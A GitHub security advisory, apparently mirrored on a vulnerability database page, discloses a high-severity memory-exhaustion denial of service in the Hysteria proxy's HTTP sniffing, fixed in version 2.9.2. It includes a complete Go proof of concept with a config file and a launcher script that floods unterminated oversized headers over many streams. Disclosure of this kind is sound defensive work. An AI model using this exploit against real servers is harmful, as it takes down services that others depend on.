GHSA-JQC5-2P7Q-FQFC

Vulnerability from github – Published: 2026-06-26 20:19 – Updated: 2026-06-26 20:19
VLAI
Summary
Hysteria: http large header with sniff cause server DoS
Details

Summary

Sending an excessively large header by an attacker could lead to a server-side DoS attack.

Details

The current sniff implementation does not explicitly specify the upper limit for HTTP headers. Attackers can continuously send excessively large headers without including \r\n\r\n, leading to ServerDoS and OutOfMemory errors.

PoC

server.yaml

listen: 127.0.0.1:8443

tls:
  cert: poc_server.crt
  key: poc_server.key

auth:
  type: password
  password: sniff-poc-password

sniff:
  enable: true
  timeout: 10s
  rewriteDomain: false
  tcpPorts: 80

masquerade:
  type: string
  string:
    content: nope
    statusCode: 404

poc.sh

#!/bin/bash
go build poc_sniff_http_dos.go
./poc_sniff_http_dos \
    --server 127.0.0.1:8443 \
    --auth sniff-poc-password \
    --insecure \
    --target-host 192.0.2.1 \
    --target-port 80 \
    --connections 16 \
    --header-bytes 838860800 \
    --linger 12

poc.go

//go:build poc

package main

import (
    "crypto/sha256"
    "crypto/x509"
    "encoding/hex"
    "errors"
    "flag"
    "fmt"
    "net"
    "strings"
    "sync"
    "time"

    coreclient "github.com/apernet/hysteria/core/v2/client"
    "github.com/apernet/hysteria/extras/v2/obfs"
)

type attackConnFactory struct {
    obfuscator obfs.Obfuscator
}

func (f *attackConnFactory) New(_ net.Addr) (net.PacketConn, error) {
    conn, err := net.ListenUDP("udp", nil)
    if err != nil {
        return nil, err
    }
    if f.obfuscator == nil {
        return conn, nil
    }
    return obfs.WrapPacketConn(conn, f.obfuscator), nil
}

func buildHeaderPayload(totalBytes, chunkSize int) []byte {
    prefix := []byte("GET / HTTP/1.1\r\nHost: victim\r\nUser-Agent: hy2-sniff-poc\r\n")
    if totalBytes <= len(prefix) {
        return prefix[:totalBytes]
    }
    out := make([]byte, 0, totalBytes)
    out = append(out, prefix...)
    linePayload := chunkSize - 32
    if linePayload < 64 {
        linePayload = 64
    }
    for i := 0; len(out) < totalBytes; i++ {
        line := fmt.Sprintf("X-Fill-%06d: %s\r\n", i, strings.Repeat("A", linePayload))
        remain := totalBytes - len(out)
        if len(line) > remain {
            line = line[:remain]
        }
        out = append(out, line...)
    }
    // 故意不追加最后一个空行 \r\n,迫使服务端在 sniff timeout 内持续读 header。
    return out
}

func makeClient(server, auth, sni string, insecure bool, pinSHA256, salamanderPSK string) (coreclient.Client, error) {
    serverAddr, err := net.ResolveUDPAddr("udp", server)
    if err != nil {
        return nil, err
    }
    cfg := &coreclient.Config{
        ConnFactory: &attackConnFactory{},
        ServerAddr:  serverAddr,
        Auth:        auth,
        TLSConfig: coreclient.TLSConfig{
            InsecureSkipVerify: insecure,
        },
    }
    host, _, err := net.SplitHostPort(server)
    if err == nil && sni == "" && net.ParseIP(host) == nil {
        cfg.TLSConfig.ServerName = host
    }
    if sni != "" {
        cfg.TLSConfig.ServerName = sni
    }
    if pinSHA256 != "" {
        nHash := strings.ToLower(strings.ReplaceAll(pinSHA256, ":", ""))
        cfg.TLSConfig.VerifyPeerCertificate = func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
            if len(rawCerts) == 0 {
                return errors.New("no peer certificate")
            }
            h := sha256.Sum256(rawCerts[0])
            if hex.EncodeToString(h[:]) == nHash {
                return nil
            }
            return errors.New("no certificate matches the pinned hash")
        }
    }
    if salamanderPSK != "" {
        ob, err := obfs.NewSalamanderObfuscator([]byte(salamanderPSK))
        if err != nil {
            return nil, err
        }
        cfg.ConnFactory = &attackConnFactory{obfuscator: ob}
    }
    c, _, err := coreclient.NewClient(cfg)
    return c, err
}

func worker(id int, c coreclient.Client, target string, payload []byte, sendChunk int, linger time.Duration, results []string) {
    conn, err := c.TCP(target)
    if err != nil {
        results[id] = fmt.Sprintf("worker=%d dial error=%v", id, err)
        return
    }
    defer conn.Close()
    _ = conn.SetWriteDeadline(time.Now().Add(linger))
    sent := 0
    for sent < len(payload) {
        end := sent + sendChunk
        if end > len(payload) {
            end = len(payload)
        }
        n, err := conn.Write(payload[sent:end])
        if err != nil {
            results[id] = fmt.Sprintf("worker=%d partial_sent=%d error=%v", id, sent, err)
            return
        }
        sent += n
    }
    time.Sleep(linger)
    results[id] = fmt.Sprintf("worker=%d sent=%d", id, sent)
}

func main() {
    server := flag.String("server", "", "Hysteria server address, e.g. 1.2.3.4:443")
    auth := flag.String("auth", "", "Hysteria auth string/password")
    sni := flag.String("sni", "", "optional TLS SNI")
    insecure := flag.Bool("insecure", false, "skip TLS verification")
    pinSHA256 := flag.String("pin-sha256", "", "optional pinned server cert SHA256")
    salamanderPSK := flag.String("obfs-salamander-password", "", "optional salamander obfs password")
    targetHost := flag.String("target-host", "192.0.2.1", "must usually be an IP so sniff.Check() runs when rewriteDomain=false")
    targetPort := flag.Int("target-port", 80, "target port that should be covered by server sniff.tcpPorts")
    connections := flag.Int("connections", 16, "number of concurrent Hysteria TCP streams")
    headerBytes := flag.Int("header-bytes", 8*1024*1024, "bytes of incomplete HTTP header per stream")
    buildChunk := flag.Int("build-chunk", 8192, "approximate size of generated filler header lines")
    sendChunk := flag.Int("send-chunk", 64*1024, "bytes written per conn.Write call")
    lingerSec := flag.Float64("linger", 12, "seconds to keep each stream open after writing")
    flag.Parse()

    if *server == "" || *auth == "" {
        panic("--server and --auth are required")
    }
    if !*insecure && *pinSHA256 == "" {
        panic("provide one of: --insecure / --pin-sha256")
    }

    payload := buildHeaderPayload(*headerBytes, *buildChunk)
    target := net.JoinHostPort(*targetHost, fmt.Sprintf("%d", *targetPort))
    linger := time.Duration(*lingerSec * float64(time.Second))

    fmt.Printf("[*] server=%s target=%s streams=%d payload=%d\n", *server, target, *connections, len(payload))

    c, err := makeClient(*server, *auth, *sni, *insecure, *pinSHA256, *salamanderPSK)
    if err != nil {
        panic(err)
    }
    defer c.Close()

    results := make([]string, *connections)
    var wg sync.WaitGroup
    start := time.Now()
    for i := 0; i < *connections; i++ {
        wg.Add(1)
        go func(i int) {
            defer wg.Done()
            worker(i, c, target, payload, *sendChunk, linger, results)
        }(i)
    }

    wg.Wait()
    fmt.Printf("[*] elapsed=%s\n", time.Since(start).Round(time.Millisecond))
    for _, line := range results {
        fmt.Printf("    %s\n", line)
    }
    fmt.Println("[+] sent incomplete oversized HTTP headers; check server-side memory / stability")
}

Impact

Testing showed that the server side used a maximum of 16GB.

Server memory DoS and may cause OOM.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/apernet/hysteria"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-26T20:19:01Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nSending an excessively large header by an attacker could lead to a server-side DoS attack.\n\n### Details\nThe current sniff implementation does not explicitly specify the upper limit for HTTP headers. Attackers can continuously send excessively large headers without including \\r\\n\\r\\n, leading to ServerDoS and OutOfMemory errors.\n\n### PoC\n\nserver.yaml\n```\nlisten: 127.0.0.1:8443\n\ntls:\n  cert: poc_server.crt\n  key: poc_server.key\n\nauth:\n  type: password\n  password: sniff-poc-password\n\nsniff:\n  enable: true\n  timeout: 10s\n  rewriteDomain: false\n  tcpPorts: 80\n\nmasquerade:\n  type: string\n  string:\n    content: nope\n    statusCode: 404\n```\n\npoc.sh\n```\n#!/bin/bash\ngo build poc_sniff_http_dos.go\n./poc_sniff_http_dos \\\n    --server 127.0.0.1:8443 \\\n    --auth sniff-poc-password \\\n    --insecure \\\n    --target-host 192.0.2.1 \\\n    --target-port 80 \\\n    --connections 16 \\\n    --header-bytes 838860800 \\\n    --linger 12\n```\n\npoc.go\n```\n//go:build poc\n\npackage main\n\nimport (\n\t\"crypto/sha256\"\n\t\"crypto/x509\"\n\t\"encoding/hex\"\n\t\"errors\"\n\t\"flag\"\n\t\"fmt\"\n\t\"net\"\n\t\"strings\"\n\t\"sync\"\n\t\"time\"\n\n\tcoreclient \"github.com/apernet/hysteria/core/v2/client\"\n\t\"github.com/apernet/hysteria/extras/v2/obfs\"\n)\n\ntype attackConnFactory struct {\n\tobfuscator obfs.Obfuscator\n}\n\nfunc (f *attackConnFactory) New(_ net.Addr) (net.PacketConn, error) {\n\tconn, err := net.ListenUDP(\"udp\", nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif f.obfuscator == nil {\n\t\treturn conn, nil\n\t}\n\treturn obfs.WrapPacketConn(conn, f.obfuscator), nil\n}\n\nfunc buildHeaderPayload(totalBytes, chunkSize int) []byte {\n\tprefix := []byte(\"GET / HTTP/1.1\\r\\nHost: victim\\r\\nUser-Agent: hy2-sniff-poc\\r\\n\")\n\tif totalBytes \u003c= len(prefix) {\n\t\treturn prefix[:totalBytes]\n\t}\n\tout := make([]byte, 0, totalBytes)\n\tout = append(out, prefix...)\n\tlinePayload := chunkSize - 32\n\tif linePayload \u003c 64 {\n\t\tlinePayload = 64\n\t}\n\tfor i := 0; len(out) \u003c totalBytes; i++ {\n\t\tline := fmt.Sprintf(\"X-Fill-%06d: %s\\r\\n\", i, strings.Repeat(\"A\", linePayload))\n\t\tremain := totalBytes - len(out)\n\t\tif len(line) \u003e remain {\n\t\t\tline = line[:remain]\n\t\t}\n\t\tout = append(out, line...)\n\t}\n\t// \u6545\u610f\u4e0d\u8ffd\u52a0\u6700\u540e\u4e00\u4e2a\u7a7a\u884c \\r\\n\uff0c\u8feb\u4f7f\u670d\u52a1\u7aef\u5728 sniff timeout \u5185\u6301\u7eed\u8bfb header\u3002\n\treturn out\n}\n\nfunc makeClient(server, auth, sni string, insecure bool, pinSHA256, salamanderPSK string) (coreclient.Client, error) {\n\tserverAddr, err := net.ResolveUDPAddr(\"udp\", server)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcfg := \u0026coreclient.Config{\n\t\tConnFactory: \u0026attackConnFactory{},\n\t\tServerAddr:  serverAddr,\n\t\tAuth:        auth,\n\t\tTLSConfig: coreclient.TLSConfig{\n\t\t\tInsecureSkipVerify: insecure,\n\t\t},\n\t}\n\thost, _, err := net.SplitHostPort(server)\n\tif err == nil \u0026\u0026 sni == \"\" \u0026\u0026 net.ParseIP(host) == nil {\n\t\tcfg.TLSConfig.ServerName = host\n\t}\n\tif sni != \"\" {\n\t\tcfg.TLSConfig.ServerName = sni\n\t}\n\tif pinSHA256 != \"\" {\n\t\tnHash := strings.ToLower(strings.ReplaceAll(pinSHA256, \":\", \"\"))\n\t\tcfg.TLSConfig.VerifyPeerCertificate = func(rawCerts [][]byte, _ [][]*x509.Certificate) error {\n\t\t\tif len(rawCerts) == 0 {\n\t\t\t\treturn errors.New(\"no peer certificate\")\n\t\t\t}\n\t\t\th := sha256.Sum256(rawCerts[0])\n\t\t\tif hex.EncodeToString(h[:]) == nHash {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\treturn errors.New(\"no certificate matches the pinned hash\")\n\t\t}\n\t}\n\tif salamanderPSK != \"\" {\n\t\tob, err := obfs.NewSalamanderObfuscator([]byte(salamanderPSK))\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tcfg.ConnFactory = \u0026attackConnFactory{obfuscator: ob}\n\t}\n\tc, _, err := coreclient.NewClient(cfg)\n\treturn c, err\n}\n\nfunc worker(id int, c coreclient.Client, target string, payload []byte, sendChunk int, linger time.Duration, results []string) {\n\tconn, err := c.TCP(target)\n\tif err != nil {\n\t\tresults[id] = fmt.Sprintf(\"worker=%d dial error=%v\", id, err)\n\t\treturn\n\t}\n\tdefer conn.Close()\n\t_ = conn.SetWriteDeadline(time.Now().Add(linger))\n\tsent := 0\n\tfor sent \u003c len(payload) {\n\t\tend := sent + sendChunk\n\t\tif end \u003e len(payload) {\n\t\t\tend = len(payload)\n\t\t}\n\t\tn, err := conn.Write(payload[sent:end])\n\t\tif err != nil {\n\t\t\tresults[id] = fmt.Sprintf(\"worker=%d partial_sent=%d error=%v\", id, sent, err)\n\t\t\treturn\n\t\t}\n\t\tsent += n\n\t}\n\ttime.Sleep(linger)\n\tresults[id] = fmt.Sprintf(\"worker=%d sent=%d\", id, sent)\n}\n\nfunc main() {\n\tserver := flag.String(\"server\", \"\", \"Hysteria server address, e.g. 1.2.3.4:443\")\n\tauth := flag.String(\"auth\", \"\", \"Hysteria auth string/password\")\n\tsni := flag.String(\"sni\", \"\", \"optional TLS SNI\")\n\tinsecure := flag.Bool(\"insecure\", false, \"skip TLS verification\")\n\tpinSHA256 := flag.String(\"pin-sha256\", \"\", \"optional pinned server cert SHA256\")\n\tsalamanderPSK := flag.String(\"obfs-salamander-password\", \"\", \"optional salamander obfs password\")\n\ttargetHost := flag.String(\"target-host\", \"192.0.2.1\", \"must usually be an IP so sniff.Check() runs when rewriteDomain=false\")\n\ttargetPort := flag.Int(\"target-port\", 80, \"target port that should be covered by server sniff.tcpPorts\")\n\tconnections := flag.Int(\"connections\", 16, \"number of concurrent Hysteria TCP streams\")\n\theaderBytes := flag.Int(\"header-bytes\", 8*1024*1024, \"bytes of incomplete HTTP header per stream\")\n\tbuildChunk := flag.Int(\"build-chunk\", 8192, \"approximate size of generated filler header lines\")\n\tsendChunk := flag.Int(\"send-chunk\", 64*1024, \"bytes written per conn.Write call\")\n\tlingerSec := flag.Float64(\"linger\", 12, \"seconds to keep each stream open after writing\")\n\tflag.Parse()\n\n\tif *server == \"\" || *auth == \"\" {\n\t\tpanic(\"--server and --auth are required\")\n\t}\n\tif !*insecure \u0026\u0026 *pinSHA256 == \"\" {\n\t\tpanic(\"provide one of: --insecure / --pin-sha256\")\n\t}\n\n\tpayload := buildHeaderPayload(*headerBytes, *buildChunk)\n\ttarget := net.JoinHostPort(*targetHost, fmt.Sprintf(\"%d\", *targetPort))\n\tlinger := time.Duration(*lingerSec * float64(time.Second))\n\n\tfmt.Printf(\"[*] server=%s target=%s streams=%d payload=%d\\n\", *server, target, *connections, len(payload))\n\n\tc, err := makeClient(*server, *auth, *sni, *insecure, *pinSHA256, *salamanderPSK)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer c.Close()\n\n\tresults := make([]string, *connections)\n\tvar wg sync.WaitGroup\n\tstart := time.Now()\n\tfor i := 0; i \u003c *connections; i++ {\n\t\twg.Add(1)\n\t\tgo func(i int) {\n\t\t\tdefer wg.Done()\n\t\t\tworker(i, c, target, payload, *sendChunk, linger, results)\n\t\t}(i)\n\t}\n\n\twg.Wait()\n\tfmt.Printf(\"[*] elapsed=%s\\n\", time.Since(start).Round(time.Millisecond))\n\tfor _, line := range results {\n\t\tfmt.Printf(\"    %s\\n\", line)\n\t}\n\tfmt.Println(\"[+] sent incomplete oversized HTTP headers; check server-side memory / stability\")\n}\n\n```\n### Impact\n\nTesting showed that the server side used a maximum of 16GB.\n\nServer memory DoS and may cause OOM.",
  "id": "GHSA-jqc5-2p7q-fqfc",
  "modified": "2026-06-26T20:19:01Z",
  "published": "2026-06-26T20:19:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/apernet/hysteria/security/advisories/GHSA-jqc5-2p7q-fqfc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apernet/hysteria"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Hysteria: http large header with sniff cause server DoS"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…